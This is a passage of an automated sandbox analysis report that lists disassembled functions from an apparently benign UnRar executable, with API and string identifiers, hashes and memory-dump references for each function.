                                                            Function 00007FF7AAD029C0 Relevance: 24.1, APIs: 9, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 281475176-2761157908
                                                            • Opcode ID: d8ebff62f91d1236d2be3df9294947289daf39f6f4791fe5f3effbb4eaca6399
                                                            • Instruction ID: 3609e0dbfc06090c5235b2a2acd8fd799af4aa7ab187cfa7ff87d59d9fe7ad99
                                                            • Opcode Fuzzy Hash: d8ebff62f91d1236d2be3df9294947289daf39f6f4791fe5f3effbb4eaca6399
                                                            • Instruction Fuzzy Hash: 1BB23C72A0A282CBF725DE25D4407FDB7A1FB44388F915135DA6B57B98CF38E6068B10
                                                            Function 00007FF7AACC9554 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 376fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                            • String ID: rtmp
                                                            • API String ID: 3587137053-870060881
                                                            • Opcode ID: a1cefdd770ce4de4ffa31ededfe2e8fb0c8dd20c20f1db6f164bd6a384b1fc30
                                                            • Instruction ID: 783dd0e2440ce36a03e81eedd8d4c0bb1466b8848b5517c27a345483aa24a2de
                                                            • Opcode Fuzzy Hash: a1cefdd770ce4de4ffa31ededfe2e8fb0c8dd20c20f1db6f164bd6a384b1fc30
                                                            • Instruction Fuzzy Hash: 70F1F522B0AB82C5FB10EF65D4401BDA760EB80794F922176EA4E53AF9DF3CD586C750
                                                            Function 00007FF7AACD7250 Relevance: 16.9, APIs: 4, Strings: 5, Instructions: 1146COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$LoadString$CloseConcurrency::cancel_current_taskHandlefflush
                                                            • String ID: $*.*$*.rev$.bad$rev
                                                            • API String ID: 547650108-1236369498
                                                            • Opcode ID: 4af67f387bd098f0509655207883fa664299e3111553daa29cbe31d5f322559c
                                                            • Instruction ID: 1e4f0138d5a29ab6c9b51d978aeb33b252027426c92d3d91fea280805d5b2bbd
                                                            • Opcode Fuzzy Hash: 4af67f387bd098f0509655207883fa664299e3111553daa29cbe31d5f322559c
                                                            • Instruction Fuzzy Hash: 81B2C322A0A792C5FB10EF65D8502FDA7A1FB44788F820176DA5D57BB9DF38E906C310
                                                            Function 00007FF7AACCDE20 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 158comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AllocBlanketClearCreateInstanceProxyStringVariant
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 917201731-3505469590
                                                            • Opcode ID: 9a29f45ff65588299afa68bb5a85e589dcf462b99d13ce30f0a11d73b46c186a
                                                            • Instruction ID: 78eeb57dd5e3e20cd44fdd1e30ed28df069d30a668e756d3f6db67bc60e6d097
                                                            • Opcode Fuzzy Hash: 9a29f45ff65588299afa68bb5a85e589dcf462b99d13ce30f0a11d73b46c186a
                                                            • Instruction Fuzzy Hash: 1D714C36A16A05C5FB10EF25D8802ADB7B4FB84B98B825176DA5E43B78CF3CD145C350
                                                            Function 00007FF7AACD84C4 Relevance: 13.0, APIs: 1, Strings: 6, Instructions: 782COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: $*.*$.bad$rar$rar$rev
                                                            • API String ID: 3668304517-1289673977
                                                            • Opcode ID: 66a72bba4a6b82fc9c22746fbbd91665e14af638e89be3b398fcc225136d84f1
                                                            • Instruction ID: 82e5021236a9787240ee3eea184aab1a77b75c22adcfaf1cc6b87ed641551059
                                                            • Opcode Fuzzy Hash: 66a72bba4a6b82fc9c22746fbbd91665e14af638e89be3b398fcc225136d84f1
                                                            • Instruction Fuzzy Hash: 95729222A0AA81C6FB10EF65D8401BDB7A1FB54784F824175DA9E07BB9DF3DE546C320
                                                            Function 00007FF7AACE2740 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesStateSuspendValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 651064505-3733053543
                                                            • Opcode ID: 517e778760eb58b8a66efb797243e246ca6bd25f122763d796fc31257656b29a
                                                            • Instruction ID: 743c42eef43a825470b6f9a77bce307167a7ad9d143e2122a382f5e604797368
                                                            • Opcode Fuzzy Hash: 517e778760eb58b8a66efb797243e246ca6bd25f122763d796fc31257656b29a
                                                            • Instruction Fuzzy Hash: 6621C671A1A642C2FB60EB20D45577EB3A1EB94740FD25075D94E069B8DF3DE0469B20
                                                            Function 00007FF7AACD0684 Relevance: 12.3, APIs: 8, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 1693479884-0
                                                            • Opcode ID: 7cba0b75250a928dd731a426afb9cb866d179b85efd3a25c5df1654fb9a7f7f0
                                                            • Instruction ID: cd1bcc62bb10736fc110e49eaf9487b5b8d6b69952e33c1a0caa21709675a444
                                                            • Opcode Fuzzy Hash: 7cba0b75250a928dd731a426afb9cb866d179b85efd3a25c5df1654fb9a7f7f0
                                                            • Instruction Fuzzy Hash: 69A11462F17B42D4FE40EB79C4445BDA361AB44BA4B921331DE6E17BE9DE3CD4828310
                                                            Function 00007FF7AACB21C4 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 349COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$Char$Buff
                                                            • String ID: CMT
                                                            • API String ID: 333758917-2756464174
                                                            • Opcode ID: 6b480d7e19afe1fe48c4fefa621223f97fb63c63dbad2e79910f50453bf83199
                                                            • Instruction ID: 4ac05e98a42852795e0d20f0284f33df815b42b7f1c32fff5fd2481d848eb545
                                                            • Opcode Fuzzy Hash: 6b480d7e19afe1fe48c4fefa621223f97fb63c63dbad2e79910f50453bf83199
                                                            • Instruction Fuzzy Hash: 64E1E262A1A7C2C6FB20AB35C8402FDA351FB45794F860271DA5D576EAEF29E542C320
                                                            Function 00007FF7AACF1D78 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 3140674995-0
                                                            • Opcode ID: 50a86863d81db5e9d0778eedc107b562812cdede2111bbcff5cf326cf6651b12
                                                            • Instruction ID: 244af170dac4cf7f5f4b8dc800a6c114cecd21d2873f8a327b7853286128ad9a
                                                            • Opcode Fuzzy Hash: 50a86863d81db5e9d0778eedc107b562812cdede2111bbcff5cf326cf6651b12
                                                            • Instruction Fuzzy Hash: 0831507260AB82C9FB609F60E8503ED7360FB84744F85443ADA9E57AA8DF38D549C710
                                                            Function 00007FF7AACF61D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: 8f69d08c15f445be57c0dc53aa82e3b385f50c61c83586db0cc49fcf1a9f44ff
                                                            • Instruction ID: 475d0d1c554dde38bd5b967b6a45fe85d1625d3054cbf5bc13df9810f338e14e
                                                            • Opcode Fuzzy Hash: 8f69d08c15f445be57c0dc53aa82e3b385f50c61c83586db0cc49fcf1a9f44ff
                                                            • Instruction Fuzzy Hash: 28318232609F82D5FB649F24E8502AEB3A0FB88754F910139EA9D43BA9DF38C546C710
                                                            Function 00007FF7AACC3C48 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                            • String ID:
                                                            • API String ID: 3398352648-0
                                                            • Opcode ID: efaefda5290a5ead3fc8a25c74f0ba06e475af27e5b9894fbcee2c20c4c71834
                                                            • Instruction ID: cdea8cb0a2ee0c34d5998c2cd7ea488a9b89f437d7bf1271d242fe3c203b6995
                                                            • Opcode Fuzzy Hash: efaefda5290a5ead3fc8a25c74f0ba06e475af27e5b9894fbcee2c20c4c71834
                                                            • Instruction Fuzzy Hash: 9A112972A19B42C6F7509F21F85016EF3A4FB88B80B855176EA9E53A68CF3CD046CB50
                                                            Function 00007FF7AACB4060 Relevance: 8.2, APIs: 5, Instructions: 730COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: cf86c9a0d9250548926b0de2de97bbb9820486d6fb4bd2887ee2b1596ab263c3
                                                            • Instruction ID: c4ee9403977d223ec9870a87d1211a490a36fbf30338c309ebd2b4a59ec43b93
                                                            • Opcode Fuzzy Hash: cf86c9a0d9250548926b0de2de97bbb9820486d6fb4bd2887ee2b1596ab263c3
                                                            • Instruction Fuzzy Hash: 7852CF22B0EB82C6FB14EB65D2513FDA361AB41784F824175CE5E177A6DE3DE846C320
                                                            Function 00007FF7AACB4E4C Relevance: 7.9, APIs: 3, Strings: 1, Instructions: 910COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: CMT
                                                            • API String ID: 3668304517-2756464174
                                                            • Opcode ID: 6bd5f66f95193c9f8f4573ebe2f72926996b11535a4f1e2021e21d3f96d43743
                                                            • Instruction ID: 7f82fdcad1db94468658bf98599842e8b5285fe1cb6c263a0df21622cd5feea1
                                                            • Opcode Fuzzy Hash: 6bd5f66f95193c9f8f4573ebe2f72926996b11535a4f1e2021e21d3f96d43743
                                                            • Instruction Fuzzy Hash: 19921F72A0A785C6FB14EB34D4401EEE7A1EB54384F86027ADA9F436E6DE7DE446C310
                                                            Function 00007FF7AACCC148 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CreateFile$CloseControlDeviceHandle_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3376050231-0
                                                            • Opcode ID: d9cbe4070f6598d3ebf89eb2a6f6c5bbe48a2532f08795f04fb166d967cb4104
                                                            • Instruction ID: 0029d2305aba6dfba86b7b94ea236b718588c36bcc0c4768d63ca26dea697f69
                                                            • Opcode Fuzzy Hash: d9cbe4070f6598d3ebf89eb2a6f6c5bbe48a2532f08795f04fb166d967cb4104
                                                            • Instruction Fuzzy Hash: 6941A162B19B41C5FB109F64E4806ADB760FB887B4F511234DEAD23AE9EF3CD0868714
                                                            Function 00007FF7AACF02FC Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 419COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-829830573
                                                            • Opcode ID: cd89441fa3eb589556af5d595975f25f409c1e3a849090506161f857c8688743
                                                            • Instruction ID: 6eab2f80a4d1b667b1b1a875d98487bfc4bfc71cbc9986f44e8c42820b683935
                                                            • Opcode Fuzzy Hash: cd89441fa3eb589556af5d595975f25f409c1e3a849090506161f857c8688743
                                                            • Instruction Fuzzy Hash: 07020163B0A782D5FF40AB64D4602FCA7A1EB44B94F824076CE5D577A5EF38E846C320
                                                            Function 00007FF7AACFF644 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AACFF674
                                                              • Part of subcall function 00007FF7AACF6434: GetCurrentProcess.KERNEL32(00007FF7AAD00C35), ref: 00007FF7AACF6461
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CurrentProcess_invalid_parameter_noinfo
                                                            • String ID: *?$.
                                                            • API String ID: 2518042432-3972193922
                                                            • Opcode ID: 5f375e6a86d94cd3e2c285c9f9dff9fd0d09093de012fa8eb1df6469ea8f9302
                                                            • Instruction ID: 5371470ecd901bf1a92e6e7c961854b06f8fbed6cbd1cdcac32129fd30b80aa4
                                                            • Opcode Fuzzy Hash: 5f375e6a86d94cd3e2c285c9f9dff9fd0d09093de012fa8eb1df6469ea8f9302
                                                            • Instruction Fuzzy Hash: 3151E267B16B96C1FB10EF6198200ACA7A0FB48BD8B864536DE5D17BA5DE3CD043C360
                                                            Function 00007FF7AAD024F0 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
